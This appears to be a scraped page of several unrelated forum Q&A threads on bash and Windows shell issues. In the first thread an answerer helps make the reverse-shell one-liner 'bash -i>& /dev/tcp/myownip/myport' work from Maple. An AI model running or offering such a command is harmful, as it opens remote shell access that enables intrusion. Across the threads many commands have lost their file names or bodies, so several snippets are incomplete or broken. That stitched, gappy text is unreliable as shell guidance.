bash: &: No such file or directory - bash

I am running the following command from maple (the function system works just like functions such as os.system from python):
system("bash -i>& /dev/tcp/myownip/myport 0>&1 2>&1")
However, it fails and this is the output:
bash: no job control in this shell bash: &: No such file or directory
Exit Value: 127
The weird thing is that the command works great when calling it from Terminal...
Any suggestions of how I could fix this?

"No job control" means that you can't bring background jobs into the foreground when running an interactive shell.
I would focus the analysis on the wording of the second error message. We know from it that bash is running. My guess is that Maple (not knowing the meaning of the > WORD construct in bash) tokenizes the string along the white space, and then does something like execv("bash", "bash", "-i>0", "/dev/tcp/myownip/myport"). At least this would explain the error message.
Could you try the following? Create a stand-alone two-line bash script like this:
bash -i>& /dev/tcp/myownip/myport 0>&1 2>&1
Set it to executable, and then invoke it from Maple with
At least the error message No such file or directory should be gone.


Running a sh file in git bash even results in variable assignment statements being shown in terminal

I am trying to run a sh file on git bash on Windows 10. I am even seeing the statements which I don't want to be shown like variable assignment in the console. But the same stuff I can't see on either Windows Subsystem for Linux(WSL) or other linux distributions. It becomes a bit annoying to see all the code lines in the sh file when trying to run that, when I am only interested in seeing the statements which I want to echo. Can someone please help in this ?
Sample sh file :
#!/usr/bin/env sh
Output on git bash:
Output on WSL(or any other Linux Systems):
That only happens when both of these occur:
set -x is used
PS4 is set
If you fix either one, the messages will go away.
If you want to fix number one, you can do set +x, or you can find the file that
is calling set -x and remove that line. Probably ~/.bash_profile or
If you want to fix number two, you can do PS4=, and you can add it to one of
those files above to persist if you want.

Is it possible to make a .bat Bash hybrid?

In cmd, it is possible to use Linux commands with the ubuntu or bash commands, but they are very fickle. In batch, it is also possible to make a VBScript-batch hybrid, which got me thinking, is it possible to make a Bash-batch hybrid? Besides being a tongue-twister, I feel that Bash-batch scripts may be really useful.
What I have tried so far
So far I tried using the empty bash and ubuntu commands alone since they switch the normal command-prompt to the Ubuntu/Bash shell, but even if you put commands after the ubuntu/bash they wouldn't show or do anything.
After I tried that, I tried using the ubuntu -run command, but like I said earlier, it’s really fickle and inconsistent on what things work and what things don't. It is less inconsistent when you pipe things into it, but it still usually doesn't work.
I looked here since it seemed like it would answer my question and I tried it, but it didn't work since it required another program (I think).
I also looked to this and I guess it failed miserably, but interesting concept.
What I've gotten from all of my research is that most people think when this is mentioned of a file that could be run either as a .bat file or as .sh shell file instead of my goal, to make a file that runs both batch and Bash commands in the same instance.
What I want this for relates to my other question where I am trying to hash a string instead of a file in cmd, and you could do it with a Bash command, but I would still like to keep the file as a batch file.
Sure you can use Bash in batch, assuming it is available. Just use the command bash -c 'cmd', where cmd is the command that you want to run in Bash.
The following batch line pipes the Hello to cat -A command that prints it including the invisible symbols:
echo Hello | bash -c "cat -A"
Compare the output with the result of the version completely written in Bash:
bash -c "echo Hello | cat -A"
They will slightly differ!

.sh output to .txt file - what am I doing wrong?

I am running Windows 10 and am trying to save the error output of a file to a text file.
So I created the file and wrote an unkown command in it (i.e. "blablubb").
After that I open the terminal (cmd.exe), switch to the directory and type 2>> log.txt.
Another window opens with "/usr/bin/bash --login -i \" in the title bar, shows me "bash: blablubb: command not found" and then closes immediately.
I want to save that output because the bash-window just opens for a split second. Every google search brings me to websites talking about redirecting the output and that Stream2 ist STDERR and therefore I should use 2>> log.txt or something smiliar that takes care of the STDERR stream.
If I try the same with a file and the content:
echo hi there
I get the output in the briefly open bash-window:
bash: #!/bin/bash: No such file or directory
hi there
But the log.txt file is empty.
If I only have echo hi therein the file I get bash: echo: command not found in the bash-window.
The log.txt also empty.
If I type the following directly in the terminal, the output is written in the log.txt:
echo hi > log.txt 2>&1
If I type directly in the terminal:
echdo hi > log.txt 2>&1
I get 'Der Befehl "echdo" ist entweder falsch geschrieben oder konnte nicht gefunden werden.' in the log.txt file.
So I guess the redirecting of the output works fine until I use
I know that .sh files are something from the unix world and that the problem might lie there but I don't know why I can not redirect the output briefly shown in the bash-console to a text file.
The 2>> redirection syntax only works if the command line containing that syntax is interpreted by bash. So it won't work from the Windows command prompt, even if the program you are running happens to be written in bash. By the time bash is running, it's too late; it gets the arguments as they were interpreted by CMD or whatever your Windows command interpreter is. (In this case, I'm guessing that means the shell script will find it has a command line argument [$1] with the value "2".)
If you open up a bash window (or just type bash in the command one) and then type the 2>>log.txt command line in that shell, it will put the error message in the file as you expect.
I think you could also do it in one step by typing bash -c " 2>>log.txt" at the Windows command prompt, but I'm not sure; Windows quoting is different than *nix quoting, and that may wind up passing literal quotation marks to bash, which won't work.
Note that CMD does have the 2>> syntax as well, and if you try to run a nonexistent windows command with 2>>errlog.txt, the "is not recognized" error message goes to the file. I think the problem comes from the fact that CMD and bash disagree on what "standard error" means, so redirecting the error output from Windows doesn't catch the error output by bash. But that's just speculation; I don't have a bash-on-Windows setup handy to test.
It would help to know if you are running Windows Subsystem for Linux (Beta). Or if you are doing something else. I'm assuming this is what you are doing on windows 10.
If this is the case are you using bash to run the script?
Are you using win-bash?
If it is win-bash I'm not very familiar and would recommend Windows Subsystem for Linux (Beta) for reasons like this. win-bash, while cool, might not be compatible with redirection operators like 2>>.
You have stdout and stderr, by default (if you don't specify) the >> (or append) will only append standard output into the txt file.
If you use 2 it will append the standard error into the txt file. Example: 2>> log.txt
This could be better described at this site.
To get exactly the command for append both stdout and stderr, go to this page.
Please tell me if this doesn't answer your question. Also, it could be more valuable to attempt a search for this answer first and explain why your search found nothing or give more extensive clarification as to what the problem is. I love answering questions and helping, but creating a new forum page for what might be an easy answer may be ineffective. I've had a bunch of fun with your question. I hope that I've helped.
That's makes a lot of sense. Thanks Mark!
Taking what mark says into account I would get Windows Subsystem for Linux (Beta). There are instructions here. Then run your script from there.

Exit from cmd script that calls bash

I have the following cmd script which calls a cygwin bash script:
C:\cygwin\bin\bash -l /D/Temp/testScript/
echo back in cmd.
The bash script is simple:
echo Hello World!
The calling part works nicely - the bash shell logs in, echos as expected, reads as expected and control passes back to the cmd as expected.
But the cmd will not exit. This is fine if I run it from a command window, but I will be calling this by double clicking on the cmd file or launching it from RUN etc.
Output I see:
D:\Temp\testScript>C:\cygwin\bin\bash -l /D/Temp/testScript/
Hello World!
D:\Temp\testScript>echo back in cmd.
back in cmd.
How do I get the cmd to exit?
Found the problem - too many bashes
I think I found the issue - probably something in my .bashrc and other files I load during cygwin login. If I change the main cmd line to remove the login flag), it works as expected - everything closes.
C:\cygwin\bin\bash /D/Temp/testScript/
But then I put the flag back:
C:\cygwin\bin\bash -l /D/Temp/testScript/
and run again. I see the output Hello World! which shows me that control is with bash, and I check Task Manager. Four instances of bash.exe are created. Then I press ENTER and see the output back in cmd. showing me that control is back with cmd. Now Task Manager shows me that three bash.exe instances remain.
So, something in my login scripts are creating extra bash shells. So it's not you, it's me.
Avoid creating persistent subshells in login scripts by using cygstart instead of cmd.
Previously I wrote that the problem was too many bashes. My .bash_profile was doing something to create bash sub-shells (that were persistent because the jobs they launched kept going in the background). This meant that when my cmd created a bash (via login) and the first bash exited, the sub-shells didn't exit.
I found that part of my login scripts involved launching some Autohotkey scripts like this:
cmd /c "$thePath" &
The fix was so easy... just use cygstart:
cygstart "$thePath"

Getting last process' PID in Makefile

My Makefile look something like this:
setsid ./CppServer>daemon.log 2>&1 &
echo $!>
What I expect it to do is to store the PID of my_awesome_script in corresponding file. However there's nothing there. So where's the problem?
If your makefile really looks like this you will get an error, because I don't see any actual make syntax, just shell syntax. However, my crystal ball tells me that these two lines might be part of the recipe for a rule. If they are, you should realise how make executes recipes; for each line a separate subshell is created, in which that line's command is executed independently: your two commands don't know anything about each other's environment. If you want two commands to be executed in the same subshell, you should issue them as one line (using line continuation characters if necessary), or use make's ONESHELL directive.
The variable you're trying to use prints the pid of the last program run in the background. It is correctly written as echo $! > filename.extension. But since you are running it in the foregorund you have two choices. Run it in the background by appending an & to the end of the line ./script_to_run &, or you can have the script itself print to file the pid of the currently running process by using echo $$ > filename.extension (inside the script). Here is a link that might help you
